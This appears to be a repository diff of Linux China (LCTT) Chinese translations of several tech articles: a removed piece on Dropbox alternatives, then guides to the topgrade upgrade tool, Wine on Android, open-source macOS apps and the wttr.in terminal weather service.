[18]:https://opensource.com/sites/default/files/uploads/mqtt_nyiso_fuel-mix.png (Fuel mix on NYISO grid)
|
||||||
|
[19]:https://github.com/IBM/ny-power
|
||||||
|
[20]:https://developer.ibm.com/code/patterns/use-mqtt-stream-real-time-data/
|
||||||
|
[21]:https://helm.sh/
|
||||||
|
[22]:https://developer.ibm.com/code/patterns/deploy-serverless-multilingual-conference-room/
|
||||||
|
[23]:https://www.home-assistant.io/
|
||||||
|
[24]:https://conferences.oreilly.com/oscon/oscon-or/public/schedule/speaker/77317
|
||||||
|
[25]:https://conferences.oreilly.com/oscon/oscon-or
|
@ -1,115 +0,0 @@
|
|||||||
可代替 Dropbox 的 5 个开源软件
|
|
||||||
=====
|
|
||||||
![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/dropbox.jpg?itok=qFwcqboT)
|
|
||||||
|
|
||||||
Dropbox 在文件共享应用中是个 800 磅的大猩猩。尽管它是个极度流行的工具,但你可能仍想使用一个软件去替代它。
|
|
||||||
|
|
||||||
出于各种充分的理由,包括安全和自由,你可能因此决定采用[开源方式][1]。或许你已经被数据泄露吓坏了,或者其定价计划不能满足你实际需要的存储量。
|
|
||||||
|
|
||||||
幸运的是,有各种各样的开源文件共享应用,可以提供给你更多的存储容量,更好的安全性,并且以低于 Dropbox 很多的价格来让你掌控你自己的数据。有多低呢?如果你有一定的技术和一台 Linux 服务器可供使用,那尝试一下免费的应用吧。
|
|
||||||
|
|
||||||
这里有 5 个最好的可以代替 Dropbox 的开源应用,此外还有几个你可能也想考虑使用的。
|
|
||||||
|
|
||||||
### ownCloud
|
|
||||||
|
|
||||||
![](https://opensource.com/sites/default/files/uploads/owncloud.png)
|
|
||||||
|
|
||||||
[ownCloud][2] 发布于 2010 年,是本文所列应用中最老的,但是不要被这一点误导:它仍然十分流行(根据该公司统计,有超过 150 万用户),并且由拥有 1100 名参与者的社区积极维护,定期发布更新。
|
|
||||||
|
|
||||||
它的主要功能——文件共享和文档协作——和 Dropbox 的功能相似。它们的主要区别(除了它的[开源协议][3])是你的文件可以托管在你的私人 Linux 服务器或云上,让用户对自己的数据有完全的控制权。(自托管是本文所列应用的一个共同的功能。)
|
|
||||||
|
|
||||||
使用 ownCloud,你可以通过 Linux、MacOS 或 Windows 的客户端和安卓、iOS 的移动应用程序来同步和访问文件。你还可以通过有密码保护的链接分享给其他人来协作或者上传和下载。数据传输通过端到端加密(E2EE)和 SSL 加密来保护安全。你还可以使用它的 [marketplace][4] 中各种各样的第三方应用来扩展它的功能。当然,它也提供付费的、商业许可的企业版本。
|
|
||||||
|
|
||||||
ownCloud 提供了详尽的[文档][5],包括安装指南和针对用户、管理员、开发者的手册。你可以从它的 GitHub 仓库中获取[源码][6]。
|
|
||||||
|
|
||||||
### NextCloud
|
|
||||||
|
|
||||||
![](https://opensource.com/sites/default/files/uploads/nextcloud.png)
|
|
||||||
|
|
||||||
[NextCloud][7]在2016年从 ownCloud 脱离出来,并且具有很多相同的功能。 NextCloud 以它的高安全性和法规遵守作为它们的一个独特的[推崇的卖点][8]。它具有 HIPAA (healthcare) 和 GDPR (隐私) 法规遵守功能, 并提供广泛的数据政策执行、加密、用户管理和审核功能。它还在传输和暂停期间对数据进行加密, 并且集成了移动设备管理和身份验证机制 (包括 LDAP/AD、单点登录、双因素身份验证等)。
|
|
||||||
像本文列表里的其他应用一样, NextCloud 是自托管的,但是如果你不想在自己的 Linux 上安装 NextCloud 服务器,公司与几个[提供商][9]伙伴合作,提供安装和托管, 并销售服务器、设备和服务支持。
|
|
||||||
在[marketplace][10]中提供了大量的apps来扩展它的功能。
|
|
||||||
|
|
||||||
NextCloud 的[文档][11]为用户、管理员和开发者提供了详细的信息,并且向它的论坛、IRC 频道和社交媒体提供了基于社区的支持。如果你想贡献或者获取它的源码,报告一个错误,查看它的 AGPLv3 许可,或者通过它的[GitHub 项目主页][12]了解更多。
|
|
||||||
### Seafile
|
|
||||||
|
|
||||||
![](https://opensource.com/sites/default/files/uploads/seafile.png)
|
|
||||||
与ownCloud或NextCloud相比,[Seafile][13]或许没有花里胡哨的卖点(或者 app 生态),但是它能完成任务。实质上, 它充当了 Linux 服务器上的虚拟驱动器, 以扩展你的桌面存储, 并允许你有选择地使用密码保护和各种级别的权限 (即只读或读写) 共享文件。
|
|
||||||
|
|
||||||
它的协作的功能包括文件夹权限控制,密码保护的下载链接和像Git一样的版本控制和保留。文件使用双因素身份验证、文件加密和 AD/LDAP 集成进行保护, 并且可以从 Windows、MacOS、Linux、iOS 或 Android 设备进行访问。
|
|
||||||
|
|
||||||
更多详细信息, 请访问 Seafile 的[GitHub仓库][14]、[服务手册][15]、[wiki][16]和[论坛][17]。请注意, Seafile 的社区版在[GPLv2][18]下获得许可, 但其专业版不是开源的。
|
|
||||||
### OnionShare
|
|
||||||
|
|
||||||
![](https://opensource.com/sites/default/files/uploads/onionshare.png)
|
|
||||||
|
|
||||||
[OnionShare][19]是一个很酷的应用: 如果你想匿名,它允许你安全地共享单个文件或文件夹。不需要设置或维护服务器,所有你需要做的就是[下载和安装][20] 无论是在 MacOS, Windows 还是 Linux 上。文件始终在你自己的计算机上; 当你共享文件时, OnionShare创建一个 web 服务器, 使其可作为 Tor 洋葱服务访问, 并生成一个不可猜测的 .onion URL, 这个URL允许收件人通过[ Tor 浏览器][21]获取文件。
|
|
||||||
|
|
||||||
你可以设置文件共享的限制, 例如限制可以下载的次数或使用自动停止计时器, 这会设置一个严格的过期日期/时间,超过这个期限便不可访问 (即使尚未访问该文件)。
|
|
||||||
|
|
||||||
OnionShare 在 [GPLv3][22] 之下被许可; 有关详细信息, 请查阅其 [GitHub 仓库][22], 其中还包括[文档][23], 介绍了这个易用文件共享软件的特点。
|
|
||||||
|
|
||||||
### Pydio Cells
|
|
||||||
|
|
||||||
![](https://opensource.com/sites/default/files/uploads/pydiochat.png)
|
|
||||||
|
|
||||||
[Pydio Cells][24]在2018年5月推出了稳定版, 是对 Pydio 共享应用程序的核心服务器代码的全面检修。由于 Pydio 的基于 PHP 的后端的限制, 开发人员决定用 Go 服务器语言和微服务体系结构重写后端。(前端仍然是基于 PHP 的)。
|
|
||||||
|
|
||||||
Pydio Cells 包括通常的共享和版本控制功能, 以及应用程序中的消息接受、移动应用程序 (Android 和 iOS), 以及一种社交网络风格的协作方法。安全性包括基于 OpenID 连接的身份验证、rest 加密、安全策略等。企业发行版中包含着高级功能, 但在社区(家庭)版本中,对于大多数中小型企业和家庭用户来说,依然是足够的。
|
|
||||||
|
|
||||||
您可以 在Linux 和 MacOS[下载][25] Pydio Cells。有关详细信息, 请查阅 [文档常见问题][26]、[源码库][27] 和 [AGPLv3 许可证][28]
|
|
||||||
|
|
||||||
### 其他
|
|
||||||
如果以上选择不能满足你的需求,你可能想考虑其他开源的文件共享型应用。
|
|
||||||
* 如果你的主要目的是在设备间同步文件而不是分享文件,考察一下 [Syncthing][29]。
|
|
||||||
* 如果你是一个Git的粉丝而不需要一个移动应用。你可能更喜欢 [SparkleShare][30]。
|
|
||||||
* 如果你主要想要一个地方聚合所有你的个人数据, 看看 [Cozy][31]。
|
|
||||||
* 如果你想找一个轻量级的或者专注于文件共享的工具,考察一下 [Scott Nesbitt's review][32]——一个罕为人知的工具。
|
|
||||||
|
|
||||||
|
|
||||||
哪个是你最喜欢的开源文件共享应用?在评论中让我们知悉。
|
|
||||||
|
|
||||||
--------------------------------------------------------------------------------
|
|
||||||
|
|
||||||
via: https://opensource.com/alternatives/dropbox
|
|
||||||
|
|
||||||
作者:[OPensource.com][a]
|
|
||||||
选题:[lujun9972](https://github.com/lujun9972)
|
|
||||||
译者:[distant1219](https://github.com/distant1219)
|
|
||||||
校对:[校对者ID](https://github.com/校对者ID)
|
|
||||||
|
|
||||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
|
||||||
|
|
||||||
[a]:https://opensource.com
|
|
||||||
[1]:https://opensource.com/open-source-way
|
|
||||||
[2]:https://owncloud.org/
|
|
||||||
[3]:https://www.gnu.org/licenses/agpl-3.0.html
|
|
||||||
[4]:https://marketplace.owncloud.com/
|
|
||||||
[5]:https://doc.owncloud.com/
|
|
||||||
[6]:https://github.com/owncloud
|
|
||||||
[7]:https://nextcloud.com/
|
|
||||||
[8]:https://nextcloud.com/secure/
|
|
||||||
[9]:https://nextcloud.com/providers/
|
|
||||||
[10]:https://apps.nextcloud.com/
|
|
||||||
[11]:https://nextcloud.com/support/
|
|
||||||
[12]:https://github.com/nextcloud
|
|
||||||
[13]:https://www.seafile.com/en/home/
|
|
||||||
[14]:https://github.com/haiwen/seafile
|
|
||||||
[15]:https://manual.seafile.com/
|
|
||||||
[16]:https://seacloud.cc/group/3/wiki/
|
|
||||||
[17]:https://forum.seafile.com/
|
|
||||||
[18]:https://github.com/haiwen/seafile/blob/master/LICENSE.txt
|
|
||||||
[19]:https://onionshare.org/
|
|
||||||
[20]:https://onionshare.org/#downloads
|
|
||||||
[21]:https://www.torproject.org/
|
|
||||||
[22]:https://github.com/micahflee/onionshare/blob/develop/LICENSE
|
|
||||||
[23]:https://github.com/micahflee/onionshare/wiki
|
|
||||||
[24]:https://pydio.com/en
|
|
||||||
[25]:https://pydio.com/download/
|
|
||||||
[26]:https://pydio.com/en/docs/faq
|
|
||||||
[27]:https://github.com/pydio/cells
|
|
||||||
[28]:https://github.com/pydio/pydio-core/blob/develop/LICENSE
|
|
||||||
[29]:https://syncthing.net/
|
|
||||||
[30]:http://www.sparkleshare.org/
|
|
||||||
[31]:https://cozy.io/en/
|
|
||||||
[32]:https://opensource.com/article/17/3/file-sharing-tools
|
|
如何在 Linux 中使用一个命令升级所有软件
======

![](https://www.ostechnix.com/wp-content/uploads/2018/06/topgrade-720x340.png)

众所周知,让我们的 Linux 系统保持最新状态会用到多种包管理器。比如说,在 Ubuntu 中,你无法只用 `sudo apt update` 和 `sudo apt upgrade` 命令升级所有软件——这两条命令仅升级使用 APT 包管理器安装的应用程序。你还有可能使用 **cargo**、[**pip**][1]、**npm**、**snap**、**flatpak** 或 [**Linuxbrew**][2] 包管理器安装了其他软件,你需要使用相应的包管理器才能把它们全部更新。现在不用这样了!来认识一下 **topgrade**,这是一个可以一次性升级系统中所有软件的工具。

你无需逐个运行每种包管理器来更新软件包。topgrade 会检测已安装的软件包、工具和插件,再调用相应的包管理器,从而用一条命令更新 Linux 中的所有软件。它是自由开源的,使用 **Rust 语言**编写,支持 GNU/Linux 和 Mac OS X。

### 在 Linux 中使用一个命令升级所有软件

topgrade 可以在 AUR 中找到。因此,你可以在任何基于 Arch 的系统中使用 [**Yay**][3] 助手程序安装它。

```
$ yay -S topgrade
```

在其他 Linux 发行版上,你可以使用 **cargo** 包管理器安装 topgrade。要安装 cargo 包管理器,请参阅以下链接。

然后,运行以下命令来安装 topgrade:

```
$ cargo install topgrade
```

安装完成后,运行 topgrade 以升级 Linux 系统中的所有软件:

```
$ topgrade
```

一旦调用了 topgrade,它将逐个执行以下任务。如有必要,系统会要求输入 root/sudo 用户密码。

1\. 运行系统的包管理器:

   * Arch:运行 **yay** 或者回退到 [**pacman**][4]
   * CentOS/RHEL:运行 `yum upgrade`
   * Fedora:运行 `dnf upgrade`
   * Debian/Ubuntu:运行 `apt update` 和 `apt dist-upgrade`
   * Linux/macOS:运行 `brew update` 和 `brew upgrade`

2\. 检查 Git 是否跟踪了以下路径。如果有,则拉取它们:

   * ~/.emacs.d(无论你使用 **Spacemacs** 还是自定义配置都适用)
   * ~/.zshrc
   * ~/.oh-my-zsh
   * ~/.tmux
   * ~/.config/fish/config.fish
   * 自定义路径

3\. Unix:运行 **zplug** 更新

4\. Unix:使用 **TPM** 升级 **tmux** 插件

5\. 运行 **cargo install-update**

6\. 升级 **Emacs** 包

7\. 升级 Vim 包。对以下插件框架均可用:

   * NeoBundle
   * [**Vundle**][5]
   * Plug

8\. 升级 [**NPM**][6] 全局安装的包

9\. 升级 **Atom** 包

10\. 升级 [**Flatpak**][7] 包

11\. 升级 [**snap**][8] 包

12\. **Linux:** 运行 **fwupdmgr** 显示固件升级(仅查看,实际不会执行升级)

13\. 运行自定义命令。

最后,topgrade 将运行 **needrestart** 以重新启动所有需要重启的服务。在 Mac OS X 中,它还会升级 App Store 中的程序。

我的 Ubuntu 18.04 LTS 测试环境的示例输出:

![][10]

它的好处是,如果某个任务失败,它将自动运行下一个任务,直至完成所有其他任务。最后,它将显示摘要,其中包含运行的任务数量、成功的数量和失败的数量等详细信息。

![][11]

**建议阅读:**

就个人而言,我很喜欢 topgrade 这种用一条命令升级各种包管理器所安装的全部软件的想法。我希望你也觉得它有用。还有更多的好东西,敬请关注!

干杯!

--------------------------------------------------------------------------------

via: https://www.ostechnix.com/how-to-upgrade-everything-using-a-single-command-in-linux/

作者:[SK][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[geekpi](https://github.com/geekpi)
校对:[校对者ID](https://github.com/校对者ID)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://www.ostechnix.com/author/sk/
[1]:https://www.ostechnix.com/manage-python-packages-using-pip/
[2]:https://www.ostechnix.com/linuxbrew-common-package-manager-linux-mac-os-x/
[3]:https://www.ostechnix.com/yay-found-yet-another-reliable-aur-helper/
[4]:https://www.ostechnix.com/getting-started-pacman/
[5]:https://www.ostechnix.com/manage-vim-plugins-using-vundle-linux/
[6]:https://www.ostechnix.com/manage-nodejs-packages-using-npm/
[7]:https://www.ostechnix.com/flatpak-new-framework-desktop-applications-linux/
[8]:https://www.ostechnix.com/install-snap-packages-arch-linux-fedora/
[10]:http://www.ostechnix.com/wp-content/uploads/2018/06/topgrade-1.png
[11]:http://www.ostechnix.com/wp-content/uploads/2018/06/topgrade-2.png
如何在 Android 上借助 Wine 来运行 Windows 应用
======

![](https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-featured-image.jpg)

Wine(一个 Linux 上的程序,不是你喝的葡萄酒)是在类 Unix 操作系统上运行 Windows 程序的一个自由开源的兼容层。它创建于 1993 年,借助它你可以在 Linux 和 macOS 操作系统上运行很多 Windows 程序,虽然有时可能还需要做一些小修改。现在,Wine 项目已经发布了 3.0 版本,这个版本可以运行在你的 Android 设备上。

在本文中,我们将向你展示,如何在你的 Android 设备上借助 Wine 来运行 Windows 应用。

**相关阅读**:[如何使用 Winepak 在 Linux 上轻松安装 Windows 游戏][1]

### 在 Wine 上你可以运行什么?

Wine 只是一个兼容层,不是一个全功能的仿真器,因此,你需要一个 x86 的 Android 设备才能完全发挥出它的优势。但是,大多数消费者手中的 Android 设备都是基于 ARM 的。

因为大多数人使用的是基于 ARM 的 Android 设备,所以有一个限制:只有为 Windows RT 编译过的那些应用才能够借助 Wine 在基于 ARM 的 Android 上运行。不过随着时间的推移,能够在 ARM 设备上运行的软件会越来越多。你可以在 XDA 开发者论坛上的这个[帖子][2]中找到兼容应用的清单。

在 ARM 上能够运行的应用的一些例子如下:

* [Keepass Portable][3]:一个密码钱包
* [Paint.NET][4]:一个图像处理程序
* [SumatraPDF][5]:一个 PDF 文档阅读器,也能够阅读一些其它类型的文档
* [Audacity][6]:一个数字录音和编辑程序

也有一些重新流行起来的开源游戏,比如 [Doom][7] 和 [Quake 2][8],以及《运输大亨(Transport Tycoon)》的开源克隆版 [OpenTTD][9]。

随着 Wine 在 Android 上越来越普及,能够在基于 ARM 的 Android 设备上运行的程序也会越来越多。Wine 项目正致力于使用 QEMU 在 ARM 上仿真 x86 的 CPU 指令,等该项目完成后,能够在 Android 上运行的应用将会迅速增多。

### 安装 Wine

在安装 Wine 之前,你首先需要确保你的设备允许安装来自 Play 商店之外的 APK。为此,你需要许可你的设备从未知源下载应用。

1\. 打开你手机上的设置,然后选择安全选项。

![wine-android-security][10]

2\. 向下拉并点击 “Unknown Sources” 的开关。

![wine-android-unknown-sources][11]

3\. 接受风险警告。

![wine-android-unknown-sources-warning][12]

4\. 打开 [Wine 安装站点][13],并点选列表中的第一个复选框。下载将自动开始。

![wine-android-download-button][14]

5\. 下载完成后,从下载目录中打开它,或者下拉通知菜单并点击这里的已完成的下载。

6\. 开始安装程序。它将提示你它需要访问和录制音频,并修改、删除和读取你的 SD 卡的内容。你可能还需要为这个应用中用到的某些程序授予访问音频的权限。

![wine-android-app-access][15]

7\. 安装完成后,点击程序图标打开它。

![wine-android-icon-small][16]

当你打开 Wine 后,它模仿的是 Windows 7 的桌面。

![wine-android-desktop][17]

Wine 有一个缺点是,你得有一个外接键盘才能进行输入。如果你是在小屏幕上运行它,触摸那些非常小的按钮会很困难,你还可以使用一个外接鼠标。

你可以通过触摸 “开始” 按钮打开两个菜单——“控制面板”和“运行”。

![wine-android-start-button][18]

### 使用 Wine 来工作

当你触摸 “控制面板” 后,你将看到三个选项——添加/删除程序、游戏控制器和 Internet 设置。

使用 “运行”,你可以打开一个对话框去运行命令。例如,通过输入 `iexplore` 来启动 “Internet Explorer”。

![wine-android-run][19]

### 在 Wine 中安装程序

1\. 在你的 Android 设备上下载应用程序(或通过云来同步)。一定要记住下载的程序保存的位置。

2\. 打开 Wine 命令提示符窗口。

3\. 输入程序所在位置的路径。如果你把下载的文件保存在 SD 卡上,输入:

```
cd sdcard/Download/[filename.exe]
```

4\. 要在 Android 上的 Wine 中运行该文件,只需要简单地输入 EXE 文件的名字即可。

如果这个支持 ARM 的文件是兼容的,它将会运行;如果不兼容,你将看到一大堆错误信息。在后一种情况下,在 Android 上的 Wine 中安装的 Windows 软件可能会损坏或缺失文件。

这个在 Android 上使用的新版本的 Wine 仍然有许多问题。它并不能在所有的 Android 设备上正常工作。它可以在我的 Galaxy S6 Edge 上运行得很好,但是在我的 Galaxy Tab 4 上却不能运行。许多游戏也不能正常运行,因为图形驱动还不支持 Direct3D。由于对触摸屏的支持还不完善,你需要一个外接的键盘和鼠标才能轻松操作它。

即便是在早期阶段的发行版中存在这样那样的问题,这种技术还是值得期待的。当然了,你要想在你的 Android 智能手机上不出问题地运行 Windows 程序,可能还需要等待一些时日。

--------------------------------------------------------------------------------

via: https://www.maketecheasier.com/run-windows-apps-android-with-wine/

作者:[Tracey Rosenberger][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[qhwdw](https://github.com/qhwdw)
校对:[校对者ID](https://github.com/校对者ID)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://www.maketecheasier.com/author/traceyrosenberger/
[1]:https://www.maketecheasier.com/winepak-install-windows-games-linux/ "How to Easily Install Windows Games on Linux with Winepak"
[2]:https://forum.xda-developers.com/showthread.php?t=2092348
[3]:http://downloads.sourceforge.net/keepass/KeePass-2.20.1.zip
[4]:http://forum.xda-developers.com/showthread.php?t=2411497
[5]:http://forum.xda-developers.com/showthread.php?t=2098594
[6]:http://forum.xda-developers.com/showthread.php?t=2103779
[7]:http://forum.xda-developers.com/showthread.php?t=2175449
[8]:http://forum.xda-developers.com/attachment.php?attachmentid=1640830&d=1358070370
[9]:http://forum.xda-developers.com/showpost.php?p=36674868&postcount=151
[10]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-security.png "wine-android-security"
[11]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-unknown-sources.jpg "wine-android-unknown-sources"
[12]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-unknown-sources-warning.png "wine-android-unknown-sources-warning"
[13]:https://dl.winehq.org/wine-builds/android/
[14]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-download-button.png "wine-android-download-button"
[15]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-app-access.jpg "wine-android-app-access"
[16]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-icon-small.jpg "wine-android-icon-small"
[17]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-desktop.png "wine-android-desktop"
[18]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-start-button.png "wine-android-start-button"
[19]:https://www.maketecheasier.com/assets/uploads/2018/07/Wine-Android-Run.png "wine-android-run"
15 个适用于 MacOS 的开源应用程序
======

![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/computer_keyboard_laptop_development_blue.png?itok=IfckxN48)

只要有可能,我都会选择使用开源工具。不久之前,我回到大学去攻读教育领导学硕士学位。虽然我把喜欢的 Linux 笔记本电脑换成了一台 MacBook Pro(因为我不能确定校园里能否用 Linux),我还是决定继续使用我喜欢的工具,哪怕是在 MacOS 上。

幸运的是,这很容易,并且没有哪个教授质疑过我用的是什么软件。既然如此,我就不能保守这个秘密。

我知道,我的一些同学最终会在学区担任领导职务,因此,我向那些使用 MacOS 或 Windows 的同学分享了下面介绍的这些开源软件。毕竟,开源软件是真正自由和友好的。我也希望他们去了解它,并认识到可以用极少的成本为他们的学生提供这些世界级的应用程序。他们中的大多数人都感到很惊讶,因为众所周知,开源软件除了像你和我这样的用户之外,压根就没有销售团队。

### 我的 MacOS 学习曲线

大多数开源工具都能像以前我在 Linux 上使用的那样工作,只是安装方法不同。但是,经过这个过程,我也学习了这些工具在 MacOS 上的一些细微差别。像 [yum][1]、[DNF][2] 和 [APT][3] 在 MacOS 的世界中压根不存在——我真的很怀念它们。

一些 MacOS 应用程序需要依赖项,并且安装它们要比我在 Linux 上习惯的方法困难很多。尽管如此,我仍然没有放弃。在这个过程中,我学会了如何在新平台上留住最好的软件。甚至 MacOS 核心的大部分也是[开源的][4]。

此外,我的 Linux 知识背景让我可以轻松自如地使用 MacOS 的命令行。我仍然使用命令行去创建和拷贝文件、添加用户,以及使用 cat、tac、more、less 和 tail 这样的[实用工具][5]。
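
这些 coreutils 风格的工具在 MacOS 自带的终端里同样可用。下面是一个小小的示意,演示用命令行创建文件并用 cat 和 tail 查看它:

```shell
# 创建一个三行的示例文件
printf 'first\nsecond\nthird\n' > notes.txt

# 查看全部内容
cat notes.txt

# 只看最后一行
tail -n 1 notes.txt
```

需要注意的是,`tac` 并不是 MacOS 默认自带的,它来自 GNU coreutils,需要另外安装。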

### 15 个适用于 MacOS 的非常好的开源应用程序

* 在大学里,要求我用 DOCX 格式的电子版来提交作业,这其实很容易:最初我使用的是 [OpenOffice][6],后来改用 [LibreOffice][7] 来完成我的论文。
* 当我需要为演示制作图像时,我使用的是我最喜欢的图像应用程序 [GIMP][8] 和 [Inkscape][9]。
* 我喜欢的播客创建工具是 [Audacity][10]。它比 Mac 上搭载的专有应用程序简单得多。我使用它来录制访谈,以及为视频演示创建配乐。
* 我在 MacOS 上最早发现的多媒体播放器是 [VideoLan][11](VLC)。
* MacOS 内置的专有视频创建工具是一个非常好的产品,但是你也可以很轻松地安装和使用 [OpenShot][12],它是一个非常好的内容创建工具。
* 当我需要为客户分析网络时,我在 Mac 上使用了易于安装的 [Nmap][13](Network Mapper)和 [Wireshark][14] 工具。
* 当我为图书管理员和其他教育工作者提供培训时,我在 MacOS 上使用 [VirtualBox][15] 来演示 Raspbian、Fedora、Ubuntu 和其它 Linux 发行版。
* 我使用 [Etcher.io][16] 在我的 MacBook 上制作引导盘:下载 ISO 文件,再把它刻录到 U 盘上。
* 我认为 [Firefox][17] 比 MacBook Pro 自带的专有浏览器更易用、更安全,并且它允许我跨操作系统同步我的书签。
* 说到电子书阅读器,[Calibre][18] 是当之无愧的选择。它很容易下载和安装,你甚至只需要几次点击就能把它配置为一台[教室里使用的电子书服务器][19]。
* 最近我在给中学生教 Python 课程,我发现可以很容易地从 [Python.org][20] 上下载和安装 Python 3 及 IDLE3 编辑器。我也喜欢学习数据科学,并与学生分享。不论你是对 Python 还是 R 感兴趣,我都建议你下载和[安装][21] [Anaconda 发行版][22]。它包含了非常棒的 iPython 编辑器、RStudio、Jupyter Notebooks、JupyterLab,以及其它一些应用程序。
* [HandBrake][23] 是一个可以把你家里的旧视频 DVD 转成 MP4 的工具,这样你就可以把它们分享到 YouTube、Vimeo,或者你的 MacOS 上的 [Kodi][24] 服务器上。

现在轮到你了:你在 MacOS(或 Windows)上使用什么样的开源软件?在下面的评论区分享出来吧。

--------------------------------------------------------------------------------

via: https://opensource.com/article/18/7/open-source-tools-macos

作者:[Don Watkins][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[qhwdw](https://github.com/qhwdw)
校对:[校对者ID](https://github.com/校对者ID)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://opensource.com/users/don-watkins
[1]:https://en.wikipedia.org/wiki/Yum_(software)
[2]:https://en.wikipedia.org/wiki/DNF_(software)
[3]:https://en.wikipedia.org/wiki/APT_(Debian)
[4]:https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/SystemTechnology/SystemTechnology.html
[5]:https://www.gnu.org/software/coreutils/coreutils.html
[6]:https://www.openoffice.org/
[7]:https://www.libreoffice.org/
[8]:https://www.gimp.org/
[9]:https://inkscape.org/en/
[10]:https://www.audacityteam.org/
[11]:https://www.videolan.org/index.html
[12]:https://www.openshot.org/
[13]:https://nmap.org/
[14]:https://www.wireshark.org/
[15]:https://www.virtualbox.org/
[16]:https://etcher.io/
[17]:https://www.mozilla.org/en-US/firefox/new/
[18]:https://calibre-ebook.com/
[19]:https://opensource.com/article/17/6/raspberrypi-ebook-server
[20]:https://www.python.org/downloads/release/python-370/
[21]:https://opensource.com/article/18/4/getting-started-anaconda-python
[22]:https://www.anaconda.com/download/#macos
[23]:https://handbrake.fr/
[24]:https://kodi.tv/download
使用 Wttr.in 在你的终端中显示天气预报
======

**[wttr.in][1] 是一个功能丰富的天气预报服务,它支持在命令行显示天气**。它可以自动检测你的位置(根据你的 IP 地址),也支持指定位置或搜索地理位置(如城市、山区等)。哦,另外**你不需要安装它——你只需要使用 cURL 或 Wget**(见下文)。

wttr.in 的功能包括:

* **显示当前天气以及 3 天内的天气预报,分为早晨、中午、傍晚和夜晚**(包括温度范围、风速和风向、能见度、降水量和降水概率)
* **可以显示月相**
* **基于你的 IP 地址自动检测位置**
* **允许指定城市名称、3 字母的机场代码、区域代码、GPS 坐标、IP 地址或域名**。你还可以指定地理位置,如湖泊、山脉、地标等
* **支持多语言的位置名称**(查询字符串必须以 Unicode 指定)
* **支持指定**天气预报显示的语言(它支持超过 50 种语言)
* **来自美国的查询使用 USCS 单位,世界其他地方使用公制系统**,但你可以通过在查询后附加 `?u` 来使用 USCS,附加 `?m` 来使用公制系统(SI)
* **3 种输出格式:用于终端的 ANSI、用于浏览器的 HTML,以及 PNG**

就像我在文章开头提到的那样,要使用 wttr.in,你只需要 cURL 或 Wget,但如果你愿意,也可以把它[安装][3]到你自己的服务器上。

**在使用 wttr.in 之前,请确保已安装 cURL。** 在 Debian、Ubuntu 或 Linux Mint(以及其他基于 Debian 或 Ubuntu 的 Linux 发行版)中,使用以下命令安装 cURL:

```
sudo apt install curl
```

### wttr.in 命令行示例

获取你所在位置的天气(wttr.in 会根据你的 IP 地址猜测你的位置):

```
curl wttr.in
```

通过在 `curl` 之后添加 `-4`,强制 cURL 将域名解析为 IPv4 地址(如果你通过 IPv6 访问 wttr.in 遇到问题):

```
curl -4 wttr.in
```

如果你想把天气预报保存为 PNG,**还可以使用 Wget**(而不是 cURL),或者你可以这样使用它:

```
wget -O- -q wttr.in
```

如果相对 cURL 你更喜欢 Wget,可以在下面的所有命令中用 `wget -O- -q` 替换 `curl`。

指定位置:

```
curl wttr.in/Dublin
```

显示地标的天气信息(本例中为埃菲尔铁塔):

```
curl wttr.in/~Eiffel+Tower
```

获取某个 IP 地址所在位置的天气信息(以下 IP 属于 GitHub):

```
curl wttr.in/@192.30.253.113
```

使用 USCS 单位检索天气:

```
curl wttr.in/Paris?u
```

如果你在美国,强制 wttr.in 使用公制系统(SI):

```
curl wttr.in/New+York?m
```

使用 Wget 将当前天气和 3 天预报下载为 PNG 图像:

```
wget wttr.in/Istanbul.png
```

如上所示,把 `.png` 附加到位置名称之后即可指定 PNG 文件名。

**对于其他示例,请查看 wttr.in 的[项目页面][2],或在终端中输入:**

```
curl wttr.in/:help
```
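
上面这些查询都遵循同一种 URL 模式,因此可以把它封装成一个放进 `~/.bashrc` 的 shell 函数。下面是一个示意(假设系统已安装 cURL;函数名 `weather` 是本文虚构的,并非 wttr.in 提供):

```shell
# 按位置查询天气;不带参数时由 wttr.in 根据 IP 猜测位置
# 第二个参数可选:u 表示 USCS 单位,m 表示公制(默认为 m)
weather() {
    local location="$1"
    local units="${2:-m}"
    curl -s "wttr.in/${location}?${units}"
}

# 用法示例:
# weather            # 当前位置
# weather Dublin     # 指定城市
# weather Paris u    # 使用 USCS 单位
```

把它加入 `~/.bashrc` 并执行 `source ~/.bashrc` 后即可直接使用。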

--------------------------------------------------------------------------------

via: https://www.linuxuprising.com/2018/07/display-weather-forecast-in-your.html

作者:[Logix][a]
选题:[lujun9972](https://github.com/lujun9972)
译者:[geekpi](https://github.com/geekpi)
校对:[校对者ID](https://github.com/校对者ID)

本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出

[a]:https://plus.google.com/118280394805678839070
[1]:https://wttr.in/
[2]:https://github.com/chubin/wttr.in
[3]:https://github.com/chubin/wttr.in#installation
[4]:https://github.com/schachmat/wego
[5]:https://github.com/chubin/wttr.in#supported-formats